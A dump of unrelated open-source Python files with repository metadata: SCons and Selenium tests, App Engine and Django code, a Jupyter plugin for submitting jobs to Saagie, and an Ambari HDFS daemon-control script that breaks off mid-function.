# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/SWIG/SWIGOUTDIR.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that use of the $SWIGOUTDIR variable causes SCons to recognize
that Java files are created in the specified output directory.
"""
import TestSCons
test = TestSCons.TestSCons()
swig = test.where_is('swig')
if not swig:
test.skip_test('Can not find installed "swig", skipping test.\n')
where_java_include=test.java_where_includes()
if not where_java_include:
test.skip_test('Can not find installed Java include files, skipping test.\n')
test.write(['SConstruct'], """\
env = Environment(tools = ['default', 'swig'],
CPPPATH=%(where_java_include)s,
)
Java_foo_interface = env.SharedLibrary(
'Java_foo_interface',
'Java_foo_interface.i',
SWIGOUTDIR = 'java/build dir',
SWIGFLAGS = '-c++ -java -Wall',
SWIGCXXFILESUFFIX = "_wrap.cpp")
""" % locals())
test.write('Java_foo_interface.i', """\
%module foopack
""")
# SCons should realize that it needs to create the "java/build dir"
# subdirectory to hold the generated .java files.
test.run(arguments = '.')
test.must_exist('java/build dir/foopackJNI.java')
test.must_exist('java/build dir/foopack.java')
# SCons should remove the built .java files.
test.run(arguments = '-c')
test.must_not_exist('java/build dir/foopackJNI.java')
test.must_not_exist('java/build dir/foopack.java')
# SCons should realize it needs to rebuild the removed .java files.
test.not_up_to_date(arguments = '.')
test.must_exist('java/build dir/foopackJNI.java')
test.must_exist('java/build dir/foopack.java')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
EmanueleCannizzaro/scons
|
test/SWIG/SWIGOUTDIR.py
|
Python
|
mit
| 2,897
| 0.005178
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from selenium import webdriver
from selenium.test.selenium.webdriver.common import select_class_tests
from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer
def setup_module(module):
webserver = SimpleWebServer()
webserver.start()
FirefoxSelectElementHandlingTests.webserver = webserver
FirefoxSelectElementHandlingTests.driver = webdriver.Firefox()
class FirefoxSelectElementHandlingTests(select_class_tests.WebDriverSelectSupportTests):
pass
def teardown_module(module):
FirefoxSelectElementHandlingTests.driver.quit()
FirefoxSelectElementHandlingTests.webserver.stop()
|
jerome-jacob/selenium
|
py/test/selenium/webdriver/firefox/ff_select_support_class_tests.py
|
Python
|
apache-2.0
| 1,419
| 0.002819
|
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
from google.appengine.api.labs import taskqueue
from google.appengine.api import memcache
from lifestream import *
class LifeStreamQueueWorker(webapp.RequestHandler):
def get(self):
memcache.set('fresh_count', 0)
indexes = LifeStream.instance().indexes
for index in indexes:
taskqueue.add(url='/app_worker/task', method='GET', params={'index':index})
taskqueue.add(url='/app_worker/refresh', method='GET', countdown=10)
class LifeStreamTaskWorker(webapp.RequestHandler):
def get(self):
index = int(self.request.get('index'))
LifeStream.update_feed(index)
class LifeStreamRefreshWorker(webapp.RequestHandler):
def get(self):
LifeStream.refresh_stream()
def main():
application = webapp.WSGIApplication([
('/app_worker/queue', LifeStreamQueueWorker),
('/app_worker/task', LifeStreamTaskWorker),
('/app_worker/refresh', LifeStreamRefreshWorker)
], debug=True)
util.run_wsgi_app(application)
if __name__ == '__main__':
main()
|
billychow/simplelifestream
|
worker.py
|
Python
|
mit
| 1,047
| 0.029608
|
from functools import wraps
import json
import os
import traceback
import validators
from jinja2 import Environment, PackageLoader
from notebook.utils import url_path_join
from notebook.base.handlers import IPythonHandler
import requests
from requests.auth import HTTPBasicAuth
env = Environment(
loader=PackageLoader('saagie', 'jinja2'),
)
SAAGIE_ROOT_URL = os.environ.get("SAAGIE_ROOT_URL", None)
SAAGIE_USERNAME = None
PLATFORMS_URL = None
SAAGIE_BASIC_AUTH_TOKEN = None
JOBS_URL_PATTERN = None
JOB_URL_PATTERN = None
JOB_UPGRADE_URL_PATTERN = None
SCRIPT_UPLOAD_URL_PATTERN = None
def get_absolute_saagie_url(saagie_url):
if saagie_url.startswith('/'):
return SAAGIE_ROOT_URL + saagie_url
return saagie_url
class ResponseError(Exception):
def __init__(self, status_code):
self.status_code = status_code
super(ResponseError, self).__init__(status_code)
class SaagieHandler(IPythonHandler):
def handle_request(self, method):
data = {k: v[0].decode() for k, v in self.request.arguments.items()}
if 'view' not in data:
self.send_error(404)
return
view_name = data.pop('view')
notebook_path = data.pop('notebook_path', None)
notebook_json = data.pop('notebook_json', None)
notebook = Notebook(notebook_path, notebook_json)
try:
template_name, template_data = views.render(
view_name, notebook=notebook, data=data, method=method)
except ResponseError as e:
self.send_error(e.status_code)
return
except:
template_name = 'internal_error.html'
template_data = {'error': traceback.format_exc()}
self.set_status(500)
template_data.update(
notebook=notebook,
)
template = env.get_template(template_name)
self.finish(template.render(template_data))
def get(self):
self.handle_request('GET')
def post(self):
self.handle_request('POST')
def check_xsrf_cookie(self):
return
class SaagieCheckHandler(IPythonHandler):
def get(self):
self.finish()
class SaagieJobRun:
def __init__(self, job, run_data):
self.job = job
self.id = run_data['id']
self.status = run_data['status']
self.stderr = run_data.get('logs_err', '')
self.stdout = run_data.get('logs_out', '')
class SaagieJob:
@classmethod
def from_id(cls, notebook, platform_id, job_id):
return SaagieJob(
notebook,
requests.get(JOB_URL_PATTERN % (platform_id, job_id), auth=SAAGIE_BASIC_AUTH_TOKEN).json())
def __init__(self, notebook, job_data):
self.notebook = notebook
self.data = job_data
self.platform_id = job_data['platform_id']
self.capsule_type = job_data['capsule_code']
self.id = job_data['id']
self.name = job_data['name']
self.last_run = None
def set_as_current(self):
self.notebook.current_job = self
@property
def url(self):
return (JOBS_URL_PATTERN + '/%s') % (self.platform_id, self.id)
@property
def admin_url(self):
return get_absolute_saagie_url('/#/manager/%s/job/%s'
% (self.platform_id, self.id))
@property
def logs_url(self):
return self.admin_url + '/logs'
@property
def is_started(self):
return self.last_run is not None
def fetch_logs(self):
job_data = requests.get(self.url, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
run_data = job_data.get('last_instance')
if run_data is None or run_data['status'] not in ('SUCCESS', 'FAILED'):
return
run_data = requests.get(
get_absolute_saagie_url('/api/v1/jobtask/%s'
% run_data['id']), auth=SAAGIE_BASIC_AUTH_TOKEN).json()
self.last_run = SaagieJobRun(self, run_data)
@property
def details_template_name(self):
return 'include/python_job_details.html'
def __str__(self):
return self.name
def __eq__(self, other):
if other is None:
return False
return self.platform_id == other.platform_id and self.id == other.id
def __lt__(self, other):
if other is None:
return False
return self.id < other.id
class SaagiePlatform:
SUPPORTED_CAPSULE_TYPES = {'python'}
def __init__(self, notebook, platform_data):
self.notebook = notebook
self.id = platform_data['id']
self.name = platform_data['name']
self.capsule_types = {c['code'] for c in platform_data['capsules']}
@property
def is_supported(self):
return not self.capsule_types.isdisjoint(self.SUPPORTED_CAPSULE_TYPES)
def get_jobs(self):
if not self.is_supported:
return []
jobs_data = requests.get(JOBS_URL_PATTERN % self.id, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
return [SaagieJob(self.notebook, job_data) for job_data in jobs_data
if job_data['category'] == 'processing' and
job_data['capsule_code'] in self.SUPPORTED_CAPSULE_TYPES]
def __eq__(self, other):
return self.id == other.id
class Notebook:
CACHE = {}
def __new__(cls, path, json):
if path in cls.CACHE:
return cls.CACHE[path]
cls.CACHE[path] = new = super(Notebook, cls).__new__(cls)
return new
def __init__(self, path, json_data):
if path is None:
path = 'Untitled.ipynb'
if json_data is None:
json_data = json.dumps({
'cells': [],
'metadata': {'kernelspec': {'name': 'python3'}}})
self.path = path
self.json = json.loads(json_data)
# In cached instances, current_job is already defined.
if not hasattr(self, 'current_job'):
self.current_job = None
@property
def name(self):
return os.path.splitext(os.path.basename(self.path))[0]
@property
def kernel_name(self):
return self.json['metadata']['kernelspec']['name']
@property
def kernel_display_name(self):
return self.json['metadata']['kernelspec']['display_name']
def get_code_cells(self):
return [cell['source'] for cell in self.json['cells']
if cell['cell_type'] == 'code']
def get_code(self, indices=None):
cells = self.get_code_cells()
if indices is None:
indices = list(range(len(cells)))
return '\n\n\n'.join([cells[i] for i in indices])
def get_platforms(self):
return [SaagiePlatform(self, platform_data)
for platform_data in requests.get(PLATFORMS_URL, auth=SAAGIE_BASIC_AUTH_TOKEN).json()]
class ViewsCollection(dict):
def add(self, func):
self[func.__name__] = func
return func
def render(self, view_name, notebook, data=None, method='GET', **kwargs):
if data is None:
data = {}
try:
view = views[view_name]
except KeyError:
raise ResponseError(404)
template_data = view(method, notebook, data, **kwargs)
if isinstance(template_data, tuple):
template_name, template_data = template_data
else:
template_name = view.__name__ + '.html'
return template_name, template_data
views = ViewsCollection()
@views.add
def modal(method, notebook, data):
return {}
def clear_basic_auth_token():
global SAAGIE_BASIC_AUTH_TOKEN
SAAGIE_BASIC_AUTH_TOKEN = None
# Init an empty Basic Auth token on first launch
clear_basic_auth_token()
def is_logged():
if SAAGIE_ROOT_URL is None or SAAGIE_BASIC_AUTH_TOKEN is None:
return False
else:
# Check if Basic token is still valid
is_logged_in = False
try:
response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=SAAGIE_BASIC_AUTH_TOKEN, allow_redirects=False)
is_logged_in = response.ok
except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err:
print ('Error while trying to connect to Saagie: ', err)
if is_logged_in is not True:
# Remove Basic Auth token from globals. It will force a new login phase.
clear_basic_auth_token()
return is_logged_in
def define_globals(saagie_root_url, saagie_username):
if saagie_root_url is not None:
global SAAGIE_ROOT_URL
global SAAGIE_USERNAME
global PLATFORMS_URL
global JOBS_URL_PATTERN
global JOB_URL_PATTERN
global JOB_UPGRADE_URL_PATTERN
global SCRIPT_UPLOAD_URL_PATTERN
SAAGIE_USERNAME = saagie_username
SAAGIE_ROOT_URL = saagie_root_url.strip("/")
PLATFORMS_URL = SAAGIE_ROOT_URL + '/api/v1/platform'
JOBS_URL_PATTERN = PLATFORMS_URL + '/%s/job'
JOB_URL_PATTERN = JOBS_URL_PATTERN + '/%s'
JOB_UPGRADE_URL_PATTERN = JOBS_URL_PATTERN + '/%s/version'
SCRIPT_UPLOAD_URL_PATTERN = JOBS_URL_PATTERN + '/upload'
@views.add
def login_form(method, notebook, data):
if method == 'POST':
# check if the given Saagie URL is well formed
if not validators.url(data['saagie_root_url']):
return {'error': 'Invalid URL', 'saagie_root_url': data['saagie_root_url'] or '', 'username': data['username'] or ''}
define_globals(data['saagie_root_url'], data['username'])
try:
basic_token = HTTPBasicAuth(data['username'], data['password'])
current_user_response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=basic_token, allow_redirects=False)
if current_user_response.ok:
# Login succeeded, keep the basic token for future API calls
global SAAGIE_BASIC_AUTH_TOKEN
SAAGIE_BASIC_AUTH_TOKEN = basic_token
except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err:
print ('Error while trying to connect to Saagie: ', err)
return {'error': 'Connection error', 'saagie_root_url': SAAGIE_ROOT_URL, 'username': SAAGIE_USERNAME or ''}
if SAAGIE_BASIC_AUTH_TOKEN is not None:
return views.render('capsule_type_chooser', notebook)
return {'error': 'Invalid URL, username or password.', 'saagie_root_url': SAAGIE_ROOT_URL, 'username': SAAGIE_USERNAME or ''}
if is_logged():
return views.render('capsule_type_chooser', notebook)
return {'error': None, 'saagie_root_url': SAAGIE_ROOT_URL or '', 'username': SAAGIE_USERNAME or ''}
def login_required(view):
@wraps(view)
def inner(method, notebook, data, *args, **kwargs):
if not is_logged():
return views.render('login_form', notebook)
return view(method, notebook, data, *args, **kwargs)
return inner
@views.add
@login_required
def capsule_type_chooser(method, notebook, data):
return {'username': SAAGIE_USERNAME}
def get_job_form(method, notebook, data):
context = {'platforms': notebook.get_platforms()}
context['values'] = ({'current': {'options': {}}} if notebook.current_job is None
else notebook.current_job.data)
return context
def create_job_base_data(data):
return {
'platform_id': data['saagie-platform'],
'category': 'processing',
'name': data['job-name'],
'description': data['description'],
'current': {
'cpu': data['cpu'],
'disk': data['disk'],
'memory': data['ram'],
'isInternalSubDomain': False,
'isInternalPort': False,
'options': {}
}
}
def upload_python_script(notebook, data):
code = notebook.get_code(map(int, data.get('code-lines', '').split('|')))
files = {'file': (data['job-name'] + '.py', code)}
return requests.post(
SCRIPT_UPLOAD_URL_PATTERN % data['saagie-platform'],
files=files, auth=SAAGIE_BASIC_AUTH_TOKEN).json()['fileName']
@views.add
@login_required
def python_job_form(method, notebook, data):
if method == 'POST':
platform_id = data['saagie-platform']
job_data = create_job_base_data(data)
job_data['capsule_code'] = 'python'
job_data['always_email'] = False
job_data['manual'] = True
job_data['retry'] = ''
current = job_data['current']
current['options']['language_version'] = data['language-version']
current['releaseNote'] = data['release-note']
current['template'] = data['shell-command']
current['file'] = upload_python_script(notebook, data)
new_job_data = requests.post(JOBS_URL_PATTERN % platform_id,
json=job_data, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
job = SaagieJob(notebook, new_job_data)
job.set_as_current()
return views.render('starting_job', notebook, {'job': job})
context = get_job_form(method, notebook, data)
context['action'] = '/saagie?view=python_job_form'
context['username'] = SAAGIE_USERNAME
return context
@views.add
@login_required
def update_python_job(method, notebook, data):
if method == 'POST':
job = notebook.current_job
platform_id = job.platform_id
data['saagie-platform'] = platform_id
data['job-name'] = job.name
data['description'] = ''
current = create_job_base_data(data)['current']
current['options']['language_version'] = data['language-version']
current['releaseNote'] = data['release-note']
current['template'] = data['shell-command']
current['file'] = upload_python_script(notebook, data)
requests.post(JOB_UPGRADE_URL_PATTERN % (platform_id, job.id),
json={'current': current}, auth=SAAGIE_BASIC_AUTH_TOKEN)
job.last_run = None
return views.render('starting_job', notebook, {'job': job})
context = get_job_form(method, notebook, data)
context['action'] = '/saagie?view=update_python_job'
context['username'] = SAAGIE_USERNAME
return context
@views.add
@login_required
def select_python_job(method, notebook, data):
if method == 'POST':
platform_id, job_id = data['job'].split('-')
notebook.current_job = SaagieJob.from_id(notebook, platform_id, job_id)
return views.render('update_python_job', notebook, data)
jobs_by_platform = []
for platform in notebook.get_platforms():
jobs = platform.get_jobs()
if jobs:
jobs_by_platform.append((platform,
list(sorted(jobs, reverse=True))))
return {'jobs_by_platform': jobs_by_platform,
'action': '/saagie?view=select_python_job', 'username': SAAGIE_USERNAME}
@views.add
@login_required
def unsupported_kernel(method, notebook, data):
return {'username': SAAGIE_USERNAME}
@views.add
@login_required
def starting_job(method, notebook, data):
job = notebook.current_job
job.fetch_logs()
if job.is_started:
return views.render('started_job', notebook, {'job': job})
return {'job': job, 'username': SAAGIE_USERNAME}
@views.add
@login_required
def started_job(method, notebook, data):
return {'job': notebook.current_job, 'username': SAAGIE_USERNAME}
@views.add
def logout(method, notebook, data):
global SAAGIE_BASIC_AUTH_TOKEN
global SAAGIE_ROOT_URL
global SAAGIE_USERNAME
SAAGIE_BASIC_AUTH_TOKEN = None
SAAGIE_ROOT_URL = None
SAAGIE_USERNAME = None
return {}
def load_jupyter_server_extension(nb_app):
web_app = nb_app.web_app
base_url = web_app.settings['base_url']
route_pattern = url_path_join(base_url, '/saagie')
web_app.add_handlers('.*$', [(route_pattern, SaagieHandler)])
route_pattern = url_path_join(base_url, '/saagie/check')
web_app.add_handlers('.*$', [(route_pattern, SaagieCheckHandler)])
|
saagie/jupyter-saagie-plugin
|
saagie/server_extension.py
|
Python
|
apache-2.0
| 16,090
| 0.00174
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-23 10:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0006_auto_20160321_1527'),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.AddField(
model_name='post',
name='blog',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='blog.Blog'),
),
]
|
pinax/pinax-blog
|
pinax/blog/migrations/0007_auto_20161223_1013.py
|
Python
|
mit
| 752
| 0.00266
|
# Generated by Django 2.2.24 on 2021-10-21 02:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("cases", "0015_case_is_quarantied"),
]
operations = [
migrations.AddIndex(
model_name="case",
index=models.Index(
fields=["created"], name="cases_case_created_a615f3_idx"
),
),
]
|
watchdogpolska/feder
|
feder/cases/migrations/0016_auto_20211021_0245.py
|
Python
|
mit
| 423
| 0
|
"""
WSGI config for ffstats project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "ffstats.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ffstats.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
daynesh/ffstats
|
ffstats/wsgi.py
|
Python
|
apache-2.0
| 1,422
| 0.000703
|
#!/usr/bin/env python
from __future__ import print_function
import argparse
import xml.etree.ElementTree as ET
def main():
parser = argparse.ArgumentParser(description="List all error without a CWE assigned in CSV format")
parser.add_argument("-F", metavar="filename", required=True,
help="XML file containing output from: ./cppcheck --errorlist --xml-version=2")
parsed = parser.parse_args()
tree = ET.parse(vars(parsed)["F"])
root = tree.getroot()
for child in root.iter("error"):
if "cwe" not in child.attrib:
print(child.attrib["id"], child.attrib["severity"], child.attrib["verbose"], sep=", ")
if __name__ == "__main__":
main()
|
danmar/cppcheck
|
tools/listErrorsWithoutCWE.py
|
Python
|
gpl-3.0
| 710
| 0.005634
|
import django_filters
from .models import Resource
class ResourceFilter(django_filters.FilterSet):
class Meta:
model = Resource
fields = [
'title',
'description',
'domains',
'topics',
'resource_type',
'suitable_for',
]
|
evildmp/django-curated-resources
|
curated_resources/filters.py
|
Python
|
bsd-2-clause
| 336
| 0.02381
|
#!/usr/bin/env python
# encoding: utf-8
"""
Download command for ssstat--download logs without adding to MongoDB.
2012-11-18 - Created by Jonathan Sick
"""
import os
import logging
from cliff.command import Command
import ingest_core
class DownloadCommand(Command):
"""ssstat download"""
log = logging.getLogger(__name__)
def get_parser(self, progName):
"""Adds command line options."""
parser = super(DownloadCommand, self).get_parser(progName)
parser.add_argument('log_bucket',
help='Name of S3 Logging Bucket')
parser.add_argument('prefix',
help='Prefix for the desired log files')
parser.add_argument('--cache-dir',
default=os.path.expandvars("$HOME/.ssstat/cache"),
action='store',
dest='cache_dir',
help='Local directory where logs are cached')
parser.add_argument('--delete',
dest='delete',
default=True,
type=bool,
help='Delete downloaded logs from S3')
return parser
def take_action(self, parsedArgs):
"""Runs the `ssstat download` command pipeline."""
self.log.debug("Running ssstat download")
# Downloads logs into root of cache directory
ingest_core.download_logs(parsedArgs.log_bucket,
parsedArgs.prefix, parsedArgs.cache_dir,
delete=parsedArgs.delete)
def main():
pass
if __name__ == '__main__':
main()
|
jonathansick/Ssstat
|
ssstat/download.py
|
Python
|
bsd-2-clause
| 1,488
| 0.008065
|
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from perf_insights import local_directory_corpus_driver
class LocalDirectoryCorpusDriverTests(unittest.TestCase):
def testTags(self):
self.assertEquals(
local_directory_corpus_driver._GetTagsForRelPath('a.json'), [])
self.assertEquals(
local_directory_corpus_driver._GetTagsForRelPath('/b/c/a.json'),
['b', 'c'])
|
zeptonaut/catapult
|
perf_insights/perf_insights/local_directory_corpus_driver_unittest.py
|
Python
|
bsd-3-clause
| 531
| 0.003766
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import re
import urllib2
import ambari_simplejson as json # simplejson is much faster comparing to Python 2.6 json module and has the same functions set.
from resource_management.core.resources.system import Directory, File, Execute
from resource_management.libraries.functions.format import format
from resource_management.libraries.functions import check_process_status
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.core import shell
from resource_management.core.shell import as_user, as_sudo
from resource_management.core.source import Template
from resource_management.core.exceptions import ComponentIsNotRunning
from resource_management.core.logger import Logger
from resource_management.libraries.functions.curl_krb_request import curl_krb_request
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions.namenode_ha_utils import get_namenode_states
from resource_management.libraries.functions.show_logs import show_logs
from ambari_commons.inet_utils import ensure_ssl_using_protocol
from zkfc_slave import ZkfcSlaveDefault
ensure_ssl_using_protocol(
Script.get_force_https_protocol_name(),
Script.get_ca_cert_file_path()
)
def safe_zkfc_op(action, env):
"""
Idempotent operation on the zkfc process to either start or stop it.
:param action: start or stop
:param env: environment
"""
Logger.info("Performing action {0} on zkfc.".format(action))
zkfc = None
if action == "start":
try:
ZkfcSlaveDefault.status_static(env)
except ComponentIsNotRunning:
ZkfcSlaveDefault.start_static(env)
if action == "stop":
try:
ZkfcSlaveDefault.status_static(env)
except ComponentIsNotRunning:
pass
else:
ZkfcSlaveDefault.stop_static(env)
def initiate_safe_zkfc_failover():
"""
If this is the active namenode, initiate a safe failover and wait for it to become the standby.
If an error occurs, force a failover to happen by killing zkfc on this host. In this case, during the Restart,
will also have to start ZKFC manually.
"""
import params
# Must kinit before running the HDFS command
if params.security_enabled:
Execute(format("{kinit_path_local} -kt {hdfs_user_keytab} {hdfs_principal_name}"),
user = params.hdfs_user)
active_namenode_id = None
standby_namenode_id = None
active_namenodes, standby_namenodes, unknown_namenodes = get_namenode_states(params.hdfs_site, params.security_enabled, params.hdfs_user)
if active_namenodes:
active_namenode_id = active_namenodes[0][0]
if standby_namenodes:
standby_namenode_id = standby_namenodes[0][0]
if active_namenode_id:
Logger.info(format("Active NameNode id: {active_namenode_id}"))
if standby_namenode_id:
Logger.info(format("Standby NameNode id: {standby_namenode_id}"))
if unknown_namenodes:
for unknown_namenode in unknown_namenodes:
Logger.info("NameNode HA state for {0} is unknown".format(unknown_namenode[0]))
if params.namenode_id == active_namenode_id and params.other_namenode_id == standby_namenode_id:
# Failover if this NameNode is active and other NameNode is up and in standby (i.e. ready to become active on failover)
Logger.info(format("NameNode {namenode_id} is active and NameNode {other_namenode_id} is in standby"))
failover_command = format("hdfs haadmin -ns {dfs_ha_nameservices} -failover {namenode_id} {other_namenode_id}")
check_standby_cmd = format("hdfs haadmin -ns {dfs_ha_nameservices} -getServiceState {namenode_id} | grep standby")
msg = "Rolling Upgrade - Initiating a ZKFC failover on active NameNode host {0}.".format(params.hostname)
Logger.info(msg)
code, out = shell.call(failover_command, user=params.hdfs_user, logoutput=True)
Logger.info(format("Rolling Upgrade - failover command returned {code}"))
wait_for_standby = False
if code == 0:
wait_for_standby = True
else:
# Try to kill ZKFC manually
was_zkfc_killed = kill_zkfc(params.hdfs_user)
code, out = shell.call(check_standby_cmd, user=params.hdfs_user, logoutput=True)
Logger.info(format("Rolling Upgrade - check for standby returned {code}"))
if code == 255 and out:
Logger.info("Rolling Upgrade - NameNode is already down.")
else:
if was_zkfc_killed:
# Only mandate that this be the standby namenode if ZKFC was indeed killed to initiate a failover.
wait_for_standby = True
if wait_for_standby:
Logger.info("Waiting for this NameNode to become the standby one.")
Execute(check_standby_cmd,
user=params.hdfs_user,
tries=50,
try_sleep=6,
logoutput=True)
else:
msg = "Rolling Upgrade - Skipping ZKFC failover on NameNode host {0}.".format(params.hostname)
Logger.info(msg)
def kill_zkfc(zkfc_user):
"""
There are two potential methods for failing over the namenode, especially during a Rolling Upgrade.
Option 1. Kill zkfc on primary namenode provided that the secondary is up and has zkfc running on it.
Option 2. Silent failover
:param zkfc_user: User that started the ZKFC process.
:return: Return True if ZKFC was killed, otherwise, false.
"""
import params
if params.dfs_ha_enabled:
if params.zkfc_pid_file:
check_process = as_user(format("ls {zkfc_pid_file} > /dev/null 2>&1 && ps -p `cat {zkfc_pid_file}` > /dev/null 2>&1"), user=zkfc_user)
code, out = shell.call(check_process)
if code == 0:
Logger.debug("ZKFC is running and will be killed.")
kill_command = format("kill -15 `cat {zkfc_pid_file}`")
Execute(kill_command,
user=zkfc_user
)
File(params.zkfc_pid_file,
action = "delete",
)
return True
return False
def service(action=None, name=None, user=None, options="", create_pid_dir=False,
create_log_dir=False):
"""
:param action: Either "start" or "stop"
:param name: Component name, e.g., "namenode", "datanode", "secondarynamenode", "zkfc"
:param user: User to run the command as
:param options: Additional options to pass to command as a string
:param create_pid_dir: Create PID directory
:param create_log_dir: Crate log file directory
"""
import params
options = options if options else ""
pid_dir = format("{hadoop_pid_dir_prefix}/{user}")
pid_file = format("{pid_dir}/hadoop-{user}-{name}.pid")
hadoop_env_exports = {
'HADOOP_LIBEXEC_DIR': params.hadoop_libexec_dir
}
log_dir = format("{hdfs_log_dir_prefix}/{user}")
# NFS GATEWAY is always started by root using jsvc due to rpcbind bugs
# on Linux such as CentOS6.2. https://bugzilla.redhat.com/show_bug.cgi?id=731542
if name == "nfs3" :
import status_params
pid_file = status_params.nfsgateway_pid_file
custom_export = {
'HADOOP_PRIVILEGED_NFS_USER': params.hdfs_user,
'HADOOP_PRIVILEGED_NFS_PID_DIR': pid_dir,
'HADOOP_PRIVILEGED_NFS_LOG_DIR': log_dir
}
hadoop_env_exports.update(custom_export)
process_id_exists_command = as_sudo(["test", "-f", pid_file]) + " && " + as_sudo(["pgrep", "-F", pid_file])
# on STOP directories shouldn't be created
# since during stop still old dirs are used (which were created during previous start)
if action != "stop":
if name == "nfs3":
Directory(params.hadoop_pid_dir_prefix,
mode=0755,
owner=params.root_user,
group=params.root_group
)
else:
Directory(params.hadoop_pid_dir_prefix,
mode=0755,
owner=params.hdfs_user,
group=params.user_group
)
if create_pid_dir:
Directory(pid_dir,
owner=user,
group=params.user_group,
create_parents = True)
if create_log_dir:
if name == "nfs3":
Directory(log_dir,
mode=0775,
owner=params.root_user,
group=params.user_group)
else:
Directory(log_dir,
owner=user,
group=params.user_group,
create_parents = True)
if params.security_enabled and name == "datanode":
## The directory where pid files are stored in the secure data environment.
hadoop_secure_dn_pid_dir = format("{hadoop_pid_dir_prefix}/{hdfs_user}")
hadoop_secure_dn_pid_file = format("{hadoop_secure_dn_pid_dir}/hadoop_secure_dn.pid")
# At datanode_non_root stack version and further, we may start datanode as a non-root even in secure cluster
if not (params.stack_version_formatted and check_stack_feature(StackFeature.DATANODE_NON_ROOT, params.stack_version_formatted)) or params.secure_dn_ports_are_in_use:
user = "root"
pid_file = format(
"{hadoop_pid_dir_prefix}/{hdfs_user}/hadoop-{hdfs_user}-{name}.pid")
if action == 'stop' and (params.stack_version_formatted and check_stack_feature(StackFeature.DATANODE_NON_ROOT, params.stack_version_formatted)) and \
os.path.isfile(hadoop_secure_dn_pid_file):
# We need special handling for this case to handle the situation
# when we configure non-root secure DN and then restart it
# to handle new configs. Otherwise we will not be able to stop
# a running instance
user = "root"
try:
check_process_status(hadoop_secure_dn_pid_file)
custom_export = {
'HADOOP_SECURE_DN_USER': params.hdfs_user
}
hadoop_env_exports.update(custom_export)
except ComponentIsNotRunning:
pass
hadoop_daemon = format("{hadoop_bin}/hadoop-daemon.sh")
if user == "root":
cmd = [hadoop_daemon, "--config", params.hadoop_conf_dir, action, name]
if options:
cmd += [options, ]
daemon_cmd = as_sudo(cmd)
else:
cmd = format("{ulimit_cmd} {hadoop_daemon} --config {hadoop_conf_dir} {action} {name}")
if options:
cmd += " " + options
daemon_cmd = as_user(cmd, user)
if action == "start":
# remove pid file from dead process
File(pid_file, action="delete", not_if=process_id_exists_command)
try:
Execute(daemon_cmd, not_if=process_id_exists_command, environment=hadoop_env_exports)
except:
show_logs(log_dir, user)
raise
elif action == "stop":
try:
Execute(daemon_cmd, only_if=process_id_exists_command, environment=hadoop_env_exports)
except:
show_logs(log_dir, user)
raise
File(pid_file, action="delete")
def get_jmx_data(nn_address, modeler_type, metric, encrypted=False, security_enabled=False):
"""
